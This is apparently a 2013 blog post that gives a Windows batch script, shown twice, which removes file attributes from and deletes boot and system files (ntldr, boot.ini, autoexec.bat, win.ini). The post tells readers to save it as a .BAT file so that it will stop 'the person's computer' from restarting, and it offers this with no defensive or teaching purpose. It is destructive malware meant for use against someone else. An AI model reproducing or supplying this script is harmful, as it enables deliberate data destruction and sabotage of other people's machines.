Posted by :
Unknown
Tuesday, June 18, 2013
Code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open Up And Copy The Code And Save It As .BAT File..
This Will Shut Down The Person's Computer.It Shuts It Off Once and Deletes The Files Needed to Reboot and Restart.
REMEMBER - DO NOT OPEN THE FILE. (For The Idiots)
YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
Hope It Was Useful..
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open Up And Copy The Code And Save It As .BAT File..
This Will Shut Down The Person's Computer.It Shuts It Off Once and Deletes The Files Needed to Reboot and Restart.
REMEMBER - DO NOT OPEN THE FILE. (For The Idiots)
YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
Hope It Was Useful..